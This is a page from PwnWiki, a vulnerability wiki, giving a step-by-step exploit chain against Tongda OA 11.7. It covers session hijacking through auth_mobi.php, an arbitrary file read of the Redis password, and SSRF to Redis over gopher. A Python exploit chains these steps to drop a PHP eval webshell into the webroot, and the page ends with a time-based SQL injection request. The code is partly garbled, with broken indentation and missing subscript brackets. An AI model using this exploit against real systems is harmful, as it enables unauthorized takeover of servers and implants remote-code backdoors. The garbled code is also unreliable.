Loading
0

通达OA11.7 利用/zh-hant

pwnwiki.com

,

漏洞利用

通达OA 任意用户登陆条件需要管理员在线。

http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台。

如果什么都没有返回,那么就利用当前的phpsessid进行访问。

获取安装目录读取redis 配置文件:

/general/approve_center/archive/getTableStruc.php

任意文件读取:

/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2

读取到redis 密码。然后通过ssrf:

/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/

EXP

# -*- coding:utf-8 -*-
import os
import requests
import re
# author :print("")
import urllib




class GenerateUrl:
    def __init__(self, password, webroot, filename):
        self.password = password
self.webroot = webroot
self.filename = filename
self.webshell = '''
        
<?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>


'''
        self.template = '''_*2
$4
AUTH
${password_len}
{password}
*1
$8
flushall
*4
$6
CONFIG
$3
SET
$10
dbfilename
${filename_len}
{filename}
*4
$6
CONFIG
$3
SET
$3
dir
${webroot_len}
{webroot}
*3
$3
SET
$1
1
${content_len}
{content}
*1
$4
save
*1
$4
quit


'''
    def __str__(self):
        webshell = self.webshell
webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
'>', '%3e')
self.template = self.template.replace("{password_len}", str(len(self.password)))
self.template = self.template.replace("{password}", self.password)
self.template = self.template.replace("{filename_len}", str(len(self.filename)))
self.template = self.template.replace("{filename}", self.filename)
self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
self.template = self.template.replace("{webroot}", self.webroot)
self.template = self.template.replace("{content_len}", str(len(self.webshell)))
self.template = self.template.replace("{content}", webshell)
self.template = self.template.replace('\n', '%0D%0A')
return urllib.quote_plus(self.template)


proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
def headers(phpsesion):
    return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
"Cookie": phpsesion
}



# 获取绝对目录
def get_path(url, headers):
    urlc = url
url = (url + '/general/approve_center/archive/getTableStruc.php')
try:
        data = requests.get(url=url, headers=headers, proxies=proxies).json()
path = data'logPath'.split('\\')0
url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
data2 = requests.get(url=url2, headers=headers, proxies=proxies)
ress = re.search('requirepass .+', data2.text).group()
return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
except:
        exit('ERROR Cookie PHPSESSID expired')




# ssrf写入文件
def ssrf_webshell(url, path, password):
    urlc = url
path = path
password = password
a = GenerateUrl(password, path + "/webroot/", "666.php")
url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
data = requests.get(url=url, headers=headers, proxies=proxies)
ddd = requests.get(url=urlc + '/666.php')
if ddd.status_code == 200:
        print('shell url:%s' % urlc + '/666.php')
else:
        print('send shell ERROR')
return True


def get_cookie(url):
    url =  url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
        response = requests.get(url=url, headers=headers)
if "RELOGIN" in response.text and response.status_code == 200:
            exit("目标用户为离线状态")
elif response.status_code == 200 and response.text == "":
            print("好了马上就能getshell了")
cookies = response.cookies
cookie = requests.utils.dict_from_cookiejar(cookies)
if   cookie'SESSIONID':
                return cookie'SESSIONID'
else:
                exit('实在抱歉,getshell不了')
else:
            print("未知错误,目标可能不存在或不存在该漏洞")
except Exception as e:
        exit('实在抱歉,getshell不了')


if __name__ == '__main__':
    import sys
try:
        url = sys.argv1
cookie =get_cookie(url)
headers = headers(cookie)
root_path = get_path(url, headers)
ssrf_webshell(url, root_path'path', root_path'redis_pass')
except:
        print('python tongda.py http://127.0.0.1')

SQL

POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
Host:
10.211.55.5
Content-Length: 39
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
i/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin:
http://10.211.55.5
Referer:
http://10.211.55.5/general/officeProduct/product_apply/index.php
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
; SID_1=24205621
Connection: close
arr5pro_id=151';select sleep(3) %23

免费、自由、人人可编辑的漏洞库--PwnWiki.com